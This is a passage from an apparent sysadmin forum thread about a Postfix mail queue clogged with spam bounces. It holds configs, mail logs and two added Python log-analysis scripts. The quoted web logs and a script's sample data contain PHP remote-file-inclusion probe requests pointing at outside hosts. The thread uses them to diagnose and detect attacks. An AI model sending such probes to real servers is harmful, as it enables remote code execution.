Mail Queue Filling Up - Spam?

Hi All,
Over the weekend the mail queue in SA filled up. This morning some users were complaining about outgoing messages not being delivered. When I checked the mail queue it had about 500 messages in it. All of them looked like spam. When I deleted them, outgoing messages started being delivered.
I have no idea why that would happen. Could it mean a hacked machine on the network? I've turned off all of my Windows machines overnight to see what happens.
Here is my config file.
mail:~ warnersmith$ postconf -n
alias_maps = hash:/etc/aliases,hash:/var/mailman/data/aliases
command_directory = /usr/sbin
config_directory = /etc/postfix
content_filter = smtp-amavis:[127.0.0.1]:10024
daemon_directory = /usr/libexec/postfix
debug_peer_level = 2
enable_server_options = yes
html_directory = no
inet_interfaces = all
local_recipient_maps =
luser_relay = postofficebox
mail_owner = postfix
mailbox_size_limit = 0
mailbox_transport = cyrus
mailq_path = /usr/bin/mailq
manpage_directory = /usr/share/man
maps_rbl_domains =
message_size_limit = 20971520
mydestination = $myhostname,localhost.$mydomain,mail.sk.com,66.XXX.8.132,10.0.0.132,sk.com,skdesign.com
mydomain = sk.com
mydomain_fallback = localhost
myhostname = sk.com
mynetworks = 127.0.0.1/32,10.0.0.1/32,206.XXX.192.99
mynetworks_style = host
newaliases_path = /usr/bin/newaliases
owner_request_special = no
queue_directory = /private/var/spool/postfix
readme_directory = /usr/share/doc/postfix
recipient_delimiter = +
relayhost = mail.chrl.twtelecom.net
sample_directory = /usr/share/doc/postfix/examples
sendmail_path = /usr/sbin/sendmail
setgid_group = postdrop
smtpd_client_restrictions = permit_mynetworks hash:/etc/postfix/smtpdreject reject_rbl_client sbl.spamhaus.org permit
smtpd_pw_server_security_options = gssapi,cram-md5,login
smtpd_recipient_restrictions = permit_sasl_authenticated,permit_mynetworks,reject_unauth_destination,permit
smtpd_sasl_auth_enable = yes
smtpd_tls_cert_file = /etc/postfix/server.pem
smtpd_tls_key_file = $smtpd_tls_cert_file
smtpd_use_pw_server = yes
unknown_local_recipient_reject_code = 550
MacBook Pro 2.0 GHz 1 GB RAM   Mac OS X (10.4.6)  
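One way to approach the "hacked machine on the network?" question from the mail log is to group the deferred messages by where they entered the server. This is an added example, not part of the original post: the log lines are constructed in Postfix syslog format, and the trusted network `10.0.0.0/24`, the host names and the function names are assumptions.

```python
import re
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed sample in Postfix syslog format; hosts and addresses are examples.
SAMPLE_LOG = """\
Oct 10 13:20:11 mail postfix/smtpd[1697]: 5EB9115C71D: client=unknown[10.0.0.45]
Oct 10 13:20:11 mail postfix/qmgr[4726]: 5EB9115C71D: from=<staff@example.com>, size=1904, nrcpt=1 (queue active)
Oct 10 13:20:12 mail postfix/smtp[1700]: 5EB9115C71D: to=<customer@example.org>, relay=relay.example.org[198.51.100.9], delay=1, status=sent (250 Ok)
Oct 10 13:20:12 mail postfix/qmgr[4726]: 5EB9115C71D: removed
Oct 10 20:11:50 mail postfix/smtpd[13189]: 37C60163818: client=host.example.net[203.0.113.7]
Oct 10 20:11:51 mail postfix/qmgr[4726]: 37C60163818: from=<forged@nonexistent.example>, size=26446, nrcpt=1 (queue active)
Oct 10 20:11:56 mail postfix/smtp[13179]: 37C60163818: to=<user@example.com>, relay=127.0.0.1[127.0.0.1], delay=6, status=bounced (host 127.0.0.1[127.0.0.1] said: 550 5.7.1 Message content rejected, UBE)
Oct 10 20:11:56 mail postfix/qmgr[4726]: 39E33163839: from=<>, size=28311, nrcpt=1 (queue active)
Oct 10 20:11:56 mail postfix/qmgr[4726]: 37C60163818: removed
Oct 10 20:11:56 mail postfix/smtp[13214]: 39E33163839: to=<forged@nonexistent.example>, relay=relay.example.org[198.51.100.9], delay=0, status=deferred (host relay.example.org[198.51.100.9] said: 450 Recipient address rejected: Domain not found)
Oct 10 21:02:10 mail postfix/smtpd[14001]: A1B2C3D4E5F: client=unknown[10.0.0.77]
Oct 10 21:02:10 mail postfix/qmgr[4726]: A1B2C3D4E5F: from=<offers@example.com>, size=3310, nrcpt=1 (queue active)
Oct 10 21:02:12 mail postfix/smtp[14005]: A1B2C3D4E5F: to=<someone@nonexistent.example>, relay=relay.example.org[198.51.100.9], delay=2, status=deferred (host relay.example.org[198.51.100.9] said: 450 Recipient address rejected: Domain not found)
"""

QUEUE_LINE = re.compile(r"postfix/[\w-]+\[\d+\]: (?P<qid>[0-9A-F]{8,}): (?P<rest>.*)")
CLIENT = re.compile(r"client=\S*\[(?P<ip>[0-9A-Fa-f.:]+)\]")
SENDER = re.compile(r"from=<(?P<sender>[^>]*)>")
STATUS = re.compile(r"\bstatus=(?P<status>\w+)")


def parse(log_text):
    """Collect client IP, envelope sender and last delivery status per queue ID."""
    msgs = defaultdict(lambda: {"client": None, "sender": None,
                                "status": None, "removed": False})
    for line in log_text.splitlines():
        m = QUEUE_LINE.search(line)
        if not m:
            continue  # connect/disconnect and other lines without a queue ID
        rec, rest = msgs[m["qid"]], m["rest"].strip()
        if rest == "removed":
            rec["removed"] = True          # no longer in the queue
        elif (c := CLIENT.match(rest)):
            rec["client"] = c["ip"]        # SMTP client that handed the message in
        elif (s := SENDER.match(rest)):
            rec["sender"] = s["sender"]    # "" is the null sender <>
        elif (st := STATUS.search(rest)):
            rec["status"] = st["status"]   # last delivery attempt wins
    return dict(msgs)


def classify(rec, trusted):
    """Name the origin of one message; `trusted` is a list of ip_network objects."""
    if rec["sender"] == "":
        return "bounce"       # delivery status notification (null sender)
    if rec["client"] is None:
        return "local"        # no SMTP client: submitted by a process on the server
    addr = ip_address(rec["client"])
    if addr.is_loopback:
        return "reinjected"   # handed back by the content filter on 127.0.0.1
    if any(addr in net for net in trusted):
        return "internal"     # a machine inside the trusted networks
    return "external"


def stuck_by_origin(log_text, trusted_cidrs):
    """Map origin class -> queue IDs whose last status is deferred and not removed."""
    trusted = [ip_network(c) for c in trusted_cidrs]
    report = defaultdict(list)
    for qid, rec in parse(log_text).items():
        if rec["status"] == "deferred" and not rec["removed"]:
            report[classify(rec, trusted)].append(qid)
    return dict(report)


if __name__ == "__main__":
    for origin, qids in stuck_by_origin(SAMPLE_LOG, ["10.0.0.0/24"]).items():
        print(f"{origin:10} {len(qids)} deferred: {', '.join(qids)}")
```

Deferred `bounce` entries are notifications about mail the server itself rejected, while `internal` and `local` entries are the ones that point at a client machine or at a process running on the server.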

Thanks Jeff. I think the code injection may be it. I have the server set to relay all outgoing messages to our ISP's mail server. When I look at the messages in the mail queue, all of them seem to be bounce backs from the ISP (domain name does not exist.)
When I look at the mail log for one of the messages with the ID of 39E33163839, I see:
Oct 10 13:20:11 mail postfix/smtpd[1697]: connect from unknown[10.0.0.45]
Oct 10 13:20:11 mail postfix/smtpd[1697]: 5EB9115C71D: client=unknown[10.0.0.45]
Oct 10 13:20:11 mail postfix/cleanup[1698]: 5EB9115C71D: message-id=<[email protected]>
Oct 10 13:20:11 mail postfix/qmgr[4726]: 5EB9115C71D: from=<[email protected]>, size=1904, nrcpt=1 (queue active)
Oct 10 20:11:02 mail postfix/qmgr[4726]: C6C32162E2F: from=, size=28300, nrcpt=1 (queue active)
Oct 10 20:11:02 mail postfix/smtp[13214]: C6C32162E2F: host relay.mail.twtelecom.net[216.136.102.250] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command)
Oct 10 20:11:03 mail postfix/smtp[13214]: C6C32162E2F: to=<[email protected]>, relay=relay.mail.twtelecom.net[216.54.204.190], delay=3698, status=deferred (host relay.mail.twtelecom.net[216.54.204.190] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command))
Oct 10 20:11:49 mail postfix/smtpd[13189]: connect from c-24-147-6-229.hsd1.ma.comcast.net[24.147.6.229]
Oct 10 20:11:50 mail postfix/smtpd[13189]: 37C60163818: client=c-24-147-6-229.hsd1.ma.comcast.net[24.147.6.229]
Oct 10 20:11:50 mail postfix/cleanup[13178]: 37C60163818: message-id=<000001c6ecc9$d4d5c980$0100007f@Alicia>
Oct 10 20:11:51 mail postfix/qmgr[4726]: 37C60163818: from=<[email protected]>, size=26446, nrcpt=1 (queue active)
Oct 10 20:11:51 mail postfix/smtpd[13189]: disconnect from c-24-147-6-229.hsd1.ma.comcast.net[24.147.6.229]
Oct 10 20:11:55 mail postfix/smtpd[13182]: connect from localhost[127.0.0.1]
Oct 10 20:11:56 mail postfix/smtpd[13182]: F29EA163837: client=localhost[127.0.0.1]
Oct 10 20:11:56 mail postfix/cleanup[13178]: F29EA163837: message-id=<000001c6ecc9$d4d5c980$0100007f@Alicia>
Oct 10 20:11:56 mail postfix/smtpd[13182]: disconnect from localhost[127.0.0.1]
Oct 10 20:11:56 mail postfix/qmgr[4726]: F29EA163837: from=<[email protected]>, size=27040, nrcpt=1 (queue active)
Oct 10 20:11:56 mail postfix/smtp[13179]: 37C60163818: to=<[email protected]>, relay=127.0.0.1[127.0.0.1], delay=6, status=bounced (host 127.0.0.1[127.0.0.1] said: 550 5.7.1 Message content rejected, UBE, id=13135-02 (in reply to end of DATA command))
Oct 10 20:11:56 mail postfix/cleanup[13178]: 39E33163839: message-id=<[email protected]>
Oct 10 20:11:56 mail postfix/qmgr[4726]: 39E33163839: from=, size=28311, nrcpt=1 (queue active)
Oct 10 20:11:56 mail postfix/qmgr[4726]: 37C60163818: removed
Oct 10 20:11:56 mail postfix/pipe[13184]: F29EA163837: to=<[email protected]>, relay=cyrus, delay=1, status=sent (sk.com)
Oct 10 20:11:56 mail postfix/qmgr[4726]: F29EA163837: removed
Oct 10 20:11:56 mail postfix/smtp[13214]: 39E33163839: host relay.mail.twtelecom.net[216.54.204.190] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command)
Oct 10 20:11:56 mail postfix/smtp[13214]: 39E33163839: to=<[email protected]>, relay=relay.mail.twtelecom.net[216.136.95.10], delay=0, status=deferred (host relay.mail.twtelecom.net[216.136.95.10] said: 450 <[email protected]>: Recipient address rejected: Domain not found (in reply to RCPT TO command))
When I look at the HTTPD logs for that same minute, I see:
69.231.131.52 - - [10/Oct/2006:14:20:11 -0400] "GET /pages/facility_02.html HTTP/1.1" 200 12193
216.120.232.145 - - [10/Oct/2006:20:11:09 -0400] "GET //components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://71.132.219.9/omg/remote.txt? HTTP/1.1" 404 -
194.52.202.141 - - [10/Oct/2006:20:11:36 -0400] "GET //components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://71.132.219.9/omg/remote.txt? HTTP/1.1" 404 -
68.71.20.37 - - [11/Oct/2006:10:20:11 -0400] "GET /images/leisure_image.3.jpg HTTP/1.1" 200 5338
68.71.20.37 - - [11/Oct/2006:10:20:11 -0400] "GET /images/leisure_image.4.jpg HTTP/1.1" 200 6872
68.71.20.37 - - [11/Oct/2006:10:20:11 -0400] "GET /images/leisure_image.5.jpg HTTP/1.1" 200 3360
The line "//components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://71.132.219.9/omg/remote.txt? HTTP/1.1" 404 -" seems to be that code injection. We don't have a file named sitemap.xml.php on our website.
Am I correct that this is a code injection?
I have three sites running on this server. One is a plain old static site for the company; it does not use PHP. One is webmail that came with OS X. The final one is a file storage site that does use PHP. It's a commercial code called Copper Project. I've turned off the site overnight to see if this still happens.
The link in Jeff's post seems to suggest a simple fix. However, I know nothing about PHP programming, so this is beyond me.
Thanks
Henry
MacBook Pro 2.0 GHz 1 GB RAM   Mac OS X (10.4.6)  
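The access-log check described in the post above can be automated: flag every request in which a query parameter carries a remote URL, and separate requests that got a 404 from ones a script actually answered. This is an added example, not part of the original post: the log lines are constructed (modelled on the request format quoted above, with documentation IP addresses), and `/index.php`, `/search.php` and the function names are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample in Apache common log format; addresses are documentation ranges.
SAMPLE_ACCESS_LOG = """\
192.0.2.10 - - [10/Oct/2006:20:11:09 -0400] "GET //components/comsitemap/sitemap.xml.php?mosConfig_absolutepath=http://198.51.100.20/omg/remote.txt? HTTP/1.1" 404 -
192.0.2.11 - - [10/Oct/2006:20:11:36 -0400] "GET /index.php?page=http%3A%2F%2F198.51.100.20%2Fomg%2Fremote.txt HTTP/1.1" 200 5120
192.0.2.12 - - [11/Oct/2006:10:20:11 -0400] "GET /images/leisure_image.3.jpg HTTP/1.1" 200 5338
192.0.2.13 - - [11/Oct/2006:10:21:02 -0400] "GET /search.php?q=http+headers HTTP/1.1" 200 2210
"""

LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+')
# A parameter value that is itself a URL is the signature of an include probe.
# Legitimate redirect parameters match too, so the verdict below does the triage.
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def verdict(status):
    """Interpret the response code for a request that carried a remote URL."""
    if status == 404:
        return "script-absent"      # the targeted file does not exist on this site
    if 200 <= status < 300:
        return "script-answered"    # a script ran with that parameter: review it
    return "other"


def find_remote_include_probes(log_text):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        # Split by hand: a leading "//" would make urlsplit() read a host name.
        path, _, query = m["target"].partition("?")
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if REMOTE_URL.match(value.strip()):
                status = int(m["status"])
                findings.append({
                    "client": m["ip"],
                    "time": m["time"],
                    "path": path,
                    "param": name,
                    "remote_url": value,
                    "status": status,
                    "verdict": verdict(status),
                })
    return findings


def scripts_to_review(findings):
    """Paths that answered a request carrying a remote URL, sorted and de-duplicated."""
    return sorted({f["path"] for f in findings if f["verdict"] == "script-answered"})


if __name__ == "__main__":
    hits = find_remote_include_probes(SAMPLE_ACCESS_LOG)
    for f in hits:
        print(f'{f["time"]} {f["client"]} {f["path"]} '
              f'{f["param"]} -> {f["status"]} ({f["verdict"]})')
    print("review:", scripts_to_review(hits))
```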

Similar Messages

  • Outgoing mail queue fills with spam

    I remember reading about how to fix this before - but cannot find the details now.
    I have a server that is trying to send mail to non-existent domains or non-existent e-mail addresses. The mail is not originating from clients.
    Typical entry in the mail queue is
    Message ID: 60D7987570
    Date: Thu Aug 17 06:18:36
    Size: 34446
    Sender: MAILER-DAEMON
    Recipient(s) & Status:
    [email protected]:
    host mail.cncnet.net[210.53.130.195] said: 450 4.1.1 <[email protected]>: Recipient address rejected: User unknown in local recipient table (in reply to RCPT TO command
    How can I set the mail server up to just ditch this stuff in the first place?
    Tim

    Here is an extract from the logs. I think I understand this now and it works as it should - but perhaps you could confirm.
    This message is clearly not stuck in the outgoing queue. From what I can see mail is received from a backup mail relay for a non existent user on this server. When we try to reject it back to sender, if the sender rejects with 550 we bin it.
    I guess the problem is what to do when the receiving mail server fails to respond? I think eventually it times out and we delete the message. Is that correct?
    Aug 18 15:27:00 server postfix/cleanup[20819]: 9F7AAE92EB: message-id=<000001c6c2d2$2aae8940$d73fa8c0@hpcsece>
    Aug 18 15:27:00 server postfix/qmgr[17315]: 9F7AAE92EB: from=<[email protected]>, size=3353, nrcpt=1 (queue active)
    Aug 18 15:27:00 server postfix/smtpd[20816]: disconnect from scanner.datacenta.net[217.33.105.206]
    Aug 18 15:27:16 server postfix/smtpd[20827]: connect from localhost[127.0.0.1]
    Aug 18 15:27:16 server postfix/smtpd[20827]: B7FA3E930E: client=localhost[127.0.0.1]
    Aug 18 15:27:16 server postfix/cleanup[20819]: B7FA3E930E: message-id=<000001c6c2d2$2aae8940$d73fa8c0@hpcsece>
    Aug 18 15:27:16 server postfix/qmgr[17315]: B7FA3E930E: from=<[email protected]>, size=3905, nrcpt=1 (queue active)
    Aug 18 15:27:16 server postfix/smtpd[20827]: disconnect from localhost[127.0.0.1]
    Aug 18 15:27:17 server postfix/smtp[20820]: 9F7AAE92EB: to=<[email protected]>, relay=127.0.0.1[127.0.0.1], delay=18, status=sent (250 2.6.0 Ok, id=20277-06, from MTA: 250 Ok: queued as B7FA3E930E)
    Aug 18 15:27:17 server postfix/qmgr[17315]: 9F7AAE92EB: removed
    Aug 18 15:27:17 server postfix/lmtp[20828]: B7FA3E930E: to=<[email protected]>, relay=/var/imap/socket/lmtp[/var/imap/socket/lmtp], delay=1, status=bounced (host /var/imap/socket/lmtp[/var/imap/socket/lmtp] said: 550-Mailbox unknown. Either there is no mailbox associated with this 550-name or you do not have authorization to see it. 550 5.1.1 User unknown (in reply to RCPT TO command))
    Aug 18 15:27:17 server postfix/cleanup[20819]: 38178E9310: message-id=<[email protected]>
    Aug 18 15:27:17 server postfix/qmgr[17315]: 38178E9310: from=, size=6025, nrcpt=1 (queue active)
    Aug 18 15:27:17 server postfix/qmgr[17315]: B7FA3E930E: removed
    Aug 18 15:27:19 server postfix/smtp[20831]: 38178E9310: to=<[email protected]>, relay=bx1.techsolsc.com[65.5.144.18], delay=2, status=bounced (host bx1.techsolsc.com[65.5.144.18] said: 550 <[email protected]>: Recipient address rejected: Unknown user (in reply to RCPT TO command))
    Aug 18 15:27:19 server postfix/qmgr[17315]: 38178E9310: removed

  • Mail queue filling up, delivery real slow

    mail server is: 10.4.2 running on a dual 2 GHz Xserve 1 gig RAM
    2 hard drives. 1 boot, 1 mail store
    My mail queue is filling up with messages that can't be delivered. Bad address usually. Not sure why they make it into the queue in the first place.
    The queue reaches as high as 7000+ messages.
    This is really killing my server. Can anyone shed some light??
    Here is postconf output:
    2bounce_notice_recipient = postmaster
    access_map_reject_code = 554
    address_verify_default_transport = $default_transport
    address_verify_local_transport = $local_transport
    address_verify_map =
    address_verify_negative_cache = yes
    address_verify_negative_expire_time = 3d
    address_verify_negative_refresh_time = 3h
    address_verify_poll_count = 3
    address_verify_poll_delay = 3s
    address_verify_positive_expire_time = 31d
    address_verify_positive_refresh_time = 7d
    address_verify_relay_transport = $relay_transport
    address_verify_relayhost = $relayhost
    address_verify_sender = postmaster
    address_verify_service_name = verify
    address_verify_transport_maps = $transport_maps
    address_verify_virtual_transport = $virtual_transport
    alias_database = hash:/etc/aliases
    alias_maps = hash:/etc/aliases,hash:/var/mailman/data/aliases
    allow_mail_to_commands = alias, forward
    allow_mail_to_files = alias, forward
    allow_min_user = no
    allow_percent_hack = yes
    allow_untrusted_routing = no
    alternate_config_directories =
    always_bcc =
    append_at_myorigin = yes
    append_dot_mydomain = yes
    application_event_drain_time = 100s
    backwards_bounce_logfile_compatibility = yes
    berkeley_db_create_buffer_size = 16777216
    berkeley_db_read_buffer_size = 131072
    best_mx_transport =
    biff = yes
    body_checks =
    body_checks_size_limit = 51200
    bounce_notice_recipient = postmaster
    bounce_queue_lifetime = 5d
    bounce_service_name = bounce
    bounce_size_limit = 50000
    broken_sasl_auth_clients = no
    canonical_maps =
    cleanup_service_name = cleanup
    command_directory = /usr/sbin
    command_expansion_filter = 1234567890!@%-_=+:,./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
    command_time_limit = 1000s
    config_directory = /etc/postfix
    content_filter = smtp-amavis:[127.0.0.1]:10024
    daemon_directory = /usr/libexec/postfix
    daemon_timeout = 18000s
    debug_peer_level = 2
    debug_peer_list =
    default_database_type = hash
    default_delivery_slot_cost = 5
    default_delivery_slot_discount = 50
    default_delivery_slot_loan = 3
    default_destination_concurrency_limit = 6
    default_destination_recipient_limit = 50
    default_extra_recipient_limit = 1000
    default_minimum_delivery_slots = 3
    default_privs = nobody
    default_process_limit = 20
    default_rbl_reply = $rbl_code Service unavailable; $rbl_class [$rbl_what] blocked using $rbl_domain${rbl_reason?; $rbl_reason}
    default_recipient_limit = 10000
    default_transport = smtp
    default_verp_delimiters = +=
    defer_code = 450
    defer_service_name = defer
    defer_transports =
    delay_notice_recipient = postmaster
    delay_warning_time = 0h
    deliver_lock_attempts = 20
    deliver_lock_delay = 1s
    disable_dns_lookups = no
    disable_mime_input_processing = no
    disable_mime_output_conversion = no
    disable_verp_bounces = no
    disable_vrfy_command = no
    dont_remove = 0
    double_bounce_sender = double-bounce
    duplicate_filter_limit = 1000
    empty_address_recipient = MAILER-DAEMON
    enable_errors_to = no
    enable_original_recipient = yes
    enable_server_options = yes
    error_notice_recipient = postmaster
    error_service_name = error
    expand_owner_alias = no
    export_environment = TZ MAIL_CONFIG
    fallback_relay =
    fallback_transport =
    fast_flush_domains = $relay_domains
    fast_flush_purge_time = 7d
    fast_flush_refresh_time = 12h
    fault_injection_code = 0
    flush_service_name = flush
    fork_attempts = 5
    fork_delay = 1s
    forward_expansion_filter = 1234567890!@%-_=+:,./abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ
    forward_path = $home/.forward${recipient_delimiter}${extension}, $home/.forward
    hash_queue_depth = 1
    hash_queue_names = incoming, active, deferred, bounce, defer, flush, hold, trace
    header_address_token_limit = 10240
    header_checks =
    header_size_limit = 102400
    helpful_warnings = yes
    home_mailbox =
    hopcount_limit = 50
    html_directory = no
    ignore_mx_lookup_error = no
    import_environment = MAIL_CONFIG MAIL_DEBUG MAIL_LOGTAG TZ XAUTHORITY DISPLAY
    in_flow_delay = 1s
    inet_interfaces = all
    initial_destination_concurrency = 4
    invalid_hostname_reject_code = 501
    ipc_idle = 100s
    ipc_timeout = 3600s
    ipc_ttl = 1000s
    line_length_limit = 2048
    lmtp_cache_connection = yes
    lmtp_connect_timeout = 0s
    lmtp_data_done_timeout = 600s
    lmtp_data_init_timeout = 120s
    lmtp_data_xfer_timeout = 180s
    lmtp_destination_concurrency_limit = $default_destination_concurrency_limit
    lmtp_destination_recipient_limit = $default_destination_recipient_limit
    lmtp_lhlo_timeout = 300s
    lmtp_mail_timeout = 300s
    lmtp_quit_timeout = 300s
    lmtp_rcpt_timeout = 300s
    lmtp_rset_timeout = 120s
    lmtp_sasl_auth_enable = no
    lmtp_sasl_password_maps =
    lmtp_sasl_security_options = noplaintext, noanonymous
    lmtp_send_xforward_command = no
    lmtp_skip_quit_response = no
    lmtp_tcp_port = 24
    lmtp_xforward_timeout = 300s
    local_command_shell =
    local_destination_concurrency_limit = 2
    local_destination_recipient_limit = 1
    local_recipient_maps =
    local_transport = local:$myhostname
    luser_relay = emailadmin
    mail_name = Postfix
    mail_owner = postfix
    mail_release_date = 20040915
    mail_spool_directory = /var/mail
    mail_version = 2.1.5
    mailbox_command =
    mailbox_command_maps =
    mailbox_delivery_lock = flock
    mailbox_size_limit = 0
    mailbox_transport = cyrus
    mailq_path = /usr/bin/mailq
    manpage_directory = /usr/share/man
    maps_rbl_domains =
    maps_rbl_reject_code = 554
    masquerade_classes = envelope_sender, header_sender, header_recipient
    masquerade_domains =
    masquerade_exceptions =
    max_idle = 100s
    max_use = 100
    maximal_backoff_time = 2700s
    maximal_queue_lifetime = 36h
    message_size_limit = 16777216
    mime_boundary_length_limit = 2048
    mime_header_checks = $header_checks
    mime_nesting_limit = 100
    minimal_backoff_time = 900s
    multi_recipient_bounce_reject_code = 550
    mydestination = $myhostname,localhost.$mydomain,myDomain.com,mail.myDomain.com
    mydomain = myDomain.com
    mydomain_fallback = localhost
    myhostname = myDomain.com
    mynetworks = 127.0.0.1/32,10.0.0.0/24,10.0.8.0/24,10.0.1.0/24
    mynetworks_style = host
    myorigin = $myhostname
    nested_header_checks = $header_checks
    newaliases_path = /usr/bin/newaliases
    non_fqdn_reject_code = 504
    notify_classes = resource, software
    owner_request_special = no
    parent_domain_matches_subdomains = debug_peer_list,fast_flush_domains,mynetworks,permit_mx_backup_networks,qmqpd_authorized_clients,relay_domains,smtpd_access_maps
    permit_mx_backup_networks =
    pickup_service_name = pickup
    prepend_delivered_header = command, file, forward
    process_id_directory = pid
    propagate_unmatched_extensions = canonical, virtual
    proxy_interfaces =
    proxy_read_maps = $local_recipient_maps $mydestination $virtual_alias_maps $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps $relocated_maps $transport_maps $mynetworks
    qmgr_clog_warn_time = 300s
    qmgr_fudge_factor = 100
    qmgr_message_active_limit = 20000
    qmgr_message_recipient_limit = 20000
    qmgr_message_recipient_minimum = 10
    qmqpd_authorized_clients =
    qmqpd_error_delay = 1s
    qmqpd_timeout = 300s
    queue_directory = /private/var/spool/postfix
    queue_file_attribute_count_limit = 100
    queue_minfree = 0
    queue_run_delay = 900s
    queue_service_name = qmgr
    rbl_reply_maps =
    readme_directory = /usr/share/doc/postfix
    receive_override_options =
    recipient_bcc_maps =
    recipient_canonical_maps =
    recipient_delimiter = +
    reject_code = 554
    relay_clientcerts =
    relay_destination_concurrency_limit = $default_destination_concurrency_limit
    relay_destination_recipient_limit = $default_destination_recipient_limit
    relay_domains = $mydestination
    relay_domains_reject_code = 554
    relay_recipient_maps =
    relay_transport = relay
    relayhost =
    relocated_maps =
    require_home_directory = no
    resolve_dequoted_address = yes
    resolve_null_domain = no
    rewrite_service_name = rewrite
    sample_directory = /usr/share/doc/postfix/examples
    sender_based_routing = no
    sender_bcc_maps =
    sender_canonical_maps =
    sendmail_path = /usr/sbin/sendmail
    service_throttle_time = 60s
    setgid_group = postdrop
    show_user_unknown_table_name = yes
    showq_service_name = showq
    smtp_always_send_ehlo = yes
    smtp_bind_address =
    smtp_connect_timeout = 30s
    smtp_data_done_timeout = 600s
    smtp_data_init_timeout = 120s
    smtp_data_xfer_timeout = 180s
    smtp_defer_if_no_mx_address_found = no
    smtp_destination_concurrency_limit = $default_destination_concurrency_limit
    smtp_destination_recipient_limit = $default_destination_recipient_limit
    smtp_enforce_tls = no
    smtp_helo_name = $myhostname
    smtp_helo_timeout = 300s
    smtp_host_lookup = dns
    smtp_line_length_limit = 990
    smtp_mail_timeout = 300s
    smtp_mx_address_limit = 0
    smtp_mx_session_limit = 2
    smtp_never_send_ehlo = no
    smtp_pix_workaround_delay_time = 10s
    smtp_pix_workaround_threshold_time = 500s
    smtp_quit_timeout = 300s
    smtp_quote_rfc821_envelope = yes
    smtp_randomize_addresses = yes
    smtp_rcpt_timeout = 300s
    smtp_rset_timeout = 120s
    smtp_sasl_auth_enable = no
    smtp_sasl_password_maps =
    smtp_sasl_security_options = noplaintext, noanonymous
    smtp_sasl_tls_security_options = $var_smtp_sasl_opts
    smtp_sasl_tls_verified_security_options = $var_smtp_sasl_tls_opts
    smtp_send_xforward_command = no
    smtp_skip_5xx_greeting = yes
    smtp_skip_quit_response = yes
    smtp_starttls_timeout = 300s
    smtp_tls_CAfile =
    smtp_tls_CApath =
    smtp_tls_cert_file =
    smtp_tls_cipherlist =
    smtp_tls_dcert_file =
    smtp_tls_dkey_file = $smtp_tls_dcert_file
    smtp_tls_enforce_peername = yes
    smtp_tls_key_file = $smtp_tls_cert_file
    smtp_tls_loglevel = 0
    smtp_tls_note_starttls_offer = no
    smtp_tls_per_site =
    smtp_tls_scert_verifydepth = 5
    smtp_tls_session_cache_database =
    smtp_tls_session_cache_timeout = 3600s
    smtp_use_tls = no
    smtp_xforward_timeout = 300s
    smtpd_authorized_verp_clients = $authorized_verp_clients
    smtpd_authorized_xclient_hosts =
    smtpd_authorized_xforward_hosts =
    smtpd_banner = $myhostname ESMTP $mail_name
    smtpd_client_connection_count_limit = 50
    smtpd_client_connection_limit_exceptions = $mynetworks
    smtpd_client_connection_rate_limit = 0
    smtpd_client_restrictions = check_recipient_access hash:/etc/postfix/access, permit_sasl_authenticated, permit_mynetworks, check_sender_access hash:/etc/postfix/whiteList, reject_invalid_hostname, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_rbl_client dnsbl.njabl.org, reject_rbl_client sbl-xbl.spamhaus.org, reject_rbl_client bl.spamcop.net, reject_rbl_client cbl.abuseat.org
    smtpd_data_restrictions =
    smtpd_delay_reject = yes
    smtpd_enforce_tls = no
    smtpd_error_sleep_time = 1s
    smtpd_etrn_restrictions =
    smtpd_expansion_filter = \t\40!"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~
    smtpd_hard_error_limit = 20
    smtpd_helo_required = no
    smtpd_helo_restrictions =
    smtpd_history_flush_threshold = 100
    smtpd_junk_command_limit = 100
    smtpd_noop_commands =
    smtpd_null_access_lookup_key =
    smtpd_policy_service_max_idle = 300s
    smtpd_policy_service_max_ttl = 1000s
    smtpd_policy_service_timeout = 100s
    smtpd_proxy_ehlo = $myhostname
    smtpd_proxy_filter =
    smtpd_proxy_timeout = 100s
    smtpd_pw_server_security_options = login,plain,cram-md5,gssapi
    smtpd_recipient_limit = 1000
    smtpd_recipient_overshoot_limit = 1000
    smtpd_recipient_restrictions = check_recipient_access hash:/etc/postfix/access, permit_mynetworks, permit_sasl_authenticated, reject_invalid_hostname, reject_non_fqdn_sender, reject_non_fqdn_recipient, reject_unknown_sender_domain, reject_unauth_destination, check_sender_access hash:/etc/postfix/whiteList
    smtpd_reject_unlisted_recipient = yes
    smtpd_reject_unlisted_sender = no
    smtpd_restriction_classes =
    smtpd_sasl_application_name = smtpd
    smtpd_sasl_auth_enable = yes
    smtpd_sasl_exceptions_networks =
    smtpd_sasl_local_domain =
    smtpd_sasl_security_options = noanonymous
    smtpd_sasl_tls_security_options = $smtpd_sasl_security_options
    smtpd_sender_login_maps =
    smtpd_sender_restrictions =
    smtpd_soft_error_limit = 10
    smtpd_starttls_timeout = 300s
    smtpd_timeout = 300s
    smtpd_tls_CAfile =
    smtpd_tls_CApath =
    smtpd_tls_ask_ccert = no
    smtpd_tls_auth_only = no
    smtpd_tls_ccert_verifydepth = 5
    smtpd_tls_cert_file = /etc/certificates/mail.myDomain.com.crt
    smtpd_tls_cipherlist =
